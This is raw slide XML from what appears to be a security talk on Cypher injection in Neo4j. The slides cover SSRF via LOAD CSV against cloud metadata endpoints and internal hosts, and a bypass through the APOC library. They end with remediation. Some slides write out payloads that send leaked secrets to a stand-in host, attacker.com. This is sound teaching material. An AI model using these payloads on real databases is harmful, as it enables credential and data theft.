            <a:off x="3619325" y="3418449"/>
            <a:ext cx="359100" cy="3591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74" name="Google Shape;3574;p35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3589448" y="3418449"/>
            <a:ext cx="359100" cy="359100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="FF6B6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75" name="Google Shape;3575;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix amt="83000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7552100" y="3564475"/>
            <a:ext cx="590771" cy="2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35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109881" y="3436650"/>
            <a:ext cx="429746" cy="4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p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6936800" y="21614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8" name="Google Shape;3578;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6936800" y="26948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9" name="Google Shape;3579;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7927400" y="26948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0" name="Google Shape;3580;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7927400" y="21614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1" name="Google Shape;3581;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7927400" y="1628075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2" name="Google Shape;3582;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix amt="72000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010252" y="3436650"/>
            <a:ext cx="429746" cy="4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Google Shape;3583;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix amt="65000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8231550" y="3396213"/>
            <a:ext cx="510651" cy="510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3584" name="Google Shape;358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5" name="Google Shape;3585;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371050" y="2806752"/>
            <a:ext cx="271094" cy="3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35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585950" y="18726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35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585950" y="24060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35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585950" y="29394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p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8576550" y="24060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0" name="Google Shape;3590;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8576550" y="2939401"/>
            <a:ext cx="185717" cy="2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1" name="Google Shape;3591;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8576550" y="1872601"/>
            <a:ext cx="185717" cy="2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5" name="Shape 3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6" name="Google Shape;3596;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246950" y="1164225"/>
            <a:ext cx="8481600" cy="28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SSRF +  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOAD CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/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=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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3597" name="Google Shape;359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98" name="Google Shape;3598;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="21524" r="20809" t="16142"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3235950" y="3095575"/>
            <a:ext cx="2503594" cy="204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2" name="Shape 3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3" name="Google Shape;3603;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75450" y="1297125"/>
            <a:ext cx="4592700" cy="289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4" name="Google Shape;36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625" y="2519702"/>
            <a:ext cx="1629000" cy="111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5" name="Google Shape;3605;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326800" y="344875"/>
            <a:ext cx="88737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600"/>
              <a:t>Leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOAD CSV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>For SSRF</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3606" name="Google Shape;3606;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix amt="36000"/>
          </a:blip>
          <a:srcRect b="25098" l="45929" r="1380" t="2259"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6874425" y="1587753"/>
            <a:ext cx="2176500" cy="254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7" name="Google Shape;3607;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7051125" y="17520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8" name="Google Shape;3608;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix amt="83000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7666425" y="3688400"/>
            <a:ext cx="590771" cy="2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9" name="Google Shape;3609;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="72000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7224206" y="3560575"/>
            <a:ext cx="429746" cy="4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0" name="Google Shape;3610;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218450" y="2196400"/>
            <a:ext cx="1755600" cy="1465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1" name="Google Shape;3611;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7051125" y="22854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2" name="Google Shape;3612;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7051125" y="28188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3" name="Google Shape;3613;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041725" y="28188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4" name="Google Shape;3614;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041725" y="22854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5" name="Google Shape;3615;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041725" y="17520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Internal server</a:t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16" name="Google Shape;3616;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="72000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7124577" y="3560575"/>
            <a:ext cx="429746" cy="4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37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix amt="65000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8345875" y="3520138"/>
            <a:ext cx="510651" cy="510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3618" name="Google Shape;3618;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2325525" y="666938"/>
            <a:ext cx="499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erver-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equest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0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orgery</a:t>
            </a:r>
            <a:endParaRPr b="0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9" name="Google Shape;3619;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4855538" y="1846850"/>
            <a:ext cx="213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1" lang="en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/secret</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2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p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957450" y="2416650"/>
            <a:ext cx="1967400" cy="132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Vulnerable</a:t>
            </a:r>
            <a:endParaRPr b="1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Server</a:t>
            </a:r>
            <a:endParaRPr b="1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1" name="Google Shape;3621;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157200" y="1517500"/>
            <a:ext cx="328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rPr>
              <a:t>LOAD CSV FROM</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk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622" name="Google Shape;3622;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5619150" y="2452239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3" name="Google Shape;3623;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5619336" y="2836951"/>
            <a:ext cx="287326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4" name="Google Shape;3624;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4606425" y="1905613"/>
            <a:ext cx="333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/latest/metadata</a:t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5" name="Google Shape;3625;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7098775" y="1987750"/>
            <a:ext cx="8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IMDSv1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p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193875" y="1840175"/>
            <a:ext cx="354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http://internal_host/secret</a:t>
            </a:r>
            <a:endParaRPr b="1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37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7051125" y="1752000"/>
            <a:ext cx="891000" cy="525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8" name="Google Shape;3628;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644075" y="1850313"/>
            <a:ext cx="3177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http://169.254.169.254</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1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9" name="Google Shape;362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71987" y="1782201"/>
            <a:ext cx="265974" cy="3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0" name="Google Shape;3630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31" name="Google Shape;3631;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3330651" y="3082799"/>
            <a:ext cx="455125" cy="60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37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7704675" y="30828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37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8695275" y="30828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4" name="Google Shape;3634;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8695275" y="25494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5" name="Google Shape;3635;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8695275" y="20160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6" name="Google Shape;3636;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7704675" y="2549400"/>
            <a:ext cx="174487" cy="2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7" name="Google Shape;3637;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9683" l="42237" r="9048" t="5367"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7704675" y="2016000"/>
            <a:ext cx="174487" cy="23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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354575" y="1969975"/>
            <a:ext cx="69543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3" name="Google Shape;3643;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691400" y="2417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Leak Secrets Through SSRF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3644" name="Google Shape;3644;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238800" y="2016425"/>
            <a:ext cx="8810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LOAD CSV</a:t>
            </a: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"http://localhost:3030/internal-api/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2100" u="none" cap="none" strike="noStrik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keys.txt"</a:t>
            </a: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secret </a:t>
            </a:r>
            <a:endParaRPr b="1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LOAD CSV FROM</a:t>
            </a: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"http://attacker.com/"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2100" u="none" cap="none" strike="noStrike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rPr>
              <a:t>+secret[0]</a:t>
            </a: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2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AS</a:t>
            </a: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line </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2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RETURN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en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secret[0]//</a:t>
            </a:r>
            <a:endParaRPr b="1"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45" name="Google Shape;3645;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="18546" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="741331"/>
            <a:ext cx="9144001" cy="1171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38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="8658" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1016275"/>
            <a:ext cx="9144001" cy="3587908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7" name="Google Shape;364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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766225" y="1044750"/>
            <a:ext cx="750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Google Shape;3653;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628325" y="1162525"/>
            <a:ext cx="7938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4800"/>
              <a:t>Responsible Disclosure</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3654" name="Google Shape;3654;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2102850" y="887450"/>
            <a:ext cx="493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 2 cents about our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5" name="Google Shape;3655;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="999450" y="2393825"/>
            <a:ext cx="3093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LOAD CSV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6" name="Google Shape;3656;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200975" y="2428775"/>
            <a:ext cx="3377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APOC Plugin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7" name="Google Shape;365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52624" cy="9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8" name="Google Shape;365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3400" y="3352825"/>
            <a:ext cx="2438376" cy="17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9" name="Google Shape;3659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7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8" name="Google Shape;3178;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="14133" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="930125" y="479525"/>
            <a:ext cx="7097050" cy="46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9" name="Google Shape;3179;p4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6933675" y="4200375"/>
            <a:ext cx="1362300" cy="943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0" name="Google Shape;3180;p4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6824100" y="4903875"/>
            <a:ext cx="346500" cy="239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1" name="Google Shape;318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8525" y="734598"/>
            <a:ext cx="5994600" cy="31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2" name="Google Shape;318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3" name="Shape 3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4" name="Google Shape;3664;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434000" y="1536675"/>
            <a:ext cx="6006000" cy="143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Google Shape;3665;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414925" y="362975"/>
            <a:ext cx="81846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LOAD CSV was blocked?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 Go APOC Library!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3666" name="Google Shape;3666;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434000" y="1596900"/>
            <a:ext cx="6990000" cy="14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Extension to Cypher Language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●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Load, Import, Export procedure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7" name="Google Shape;3667;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5256675" y="4746550"/>
            <a:ext cx="35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https://neo4j.com/developer/neo4j-apoc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2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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298475" y="1178175"/>
            <a:ext cx="5992500" cy="1538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4" name="Google Shape;3674;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414925" y="362975"/>
            <a:ext cx="81846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LOAD CSV was blocked?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 Go APOC Library! #2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3675" name="Google Shape;3675;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226275" y="1215900"/>
            <a:ext cx="88791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MATCH</a:t>
            </a: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 (c:Character) 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CALL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="25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apoc.load.json</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500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("https://attacker.com/data.json?leaked="+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="25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c.name</a:t>
            </a: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YIELD</a:t>
            </a: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 value</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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RETURN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t> value//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6" name="Google Shape;3676;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164025" y="4746550"/>
            <a:ext cx="35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https://neo4j.com/developer/neo4j-apoc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7" name="Google Shape;3677;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="29398" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="75700" y="1372638"/>
            <a:ext cx="8992600" cy="1415214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3678" name="Google Shape;367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79" name="Google Shape;3679;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="5846" t="8003"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="3571000"/>
            <a:ext cx="2091075" cy="15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3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4" name="Google Shape;3684;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530200" y="638450"/>
            <a:ext cx="6363900" cy="2875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p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713250" y="1725900"/>
            <a:ext cx="77175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Remediation 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&amp;</a:t>
            </a:r>
            <a:endParaRPr sz="6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 Mitigation</a:t>
            </a:r>
            <a:endParaRPr sz="6000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3686" name="Google Shape;368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9825" y="2682925"/>
            <a:ext cx="2103800" cy="1793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87" name="Google Shape;368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1" name="Shape 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2" name="Google Shape;3692;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="3133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000"/>
              <a:t>Remediation</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3693" name="Google Shape;3693;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="85900" y="869600"/>
            <a:ext cx="70209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3500"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parameterized Queries</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="1C4587"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3694" name="Google Shape;3694;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
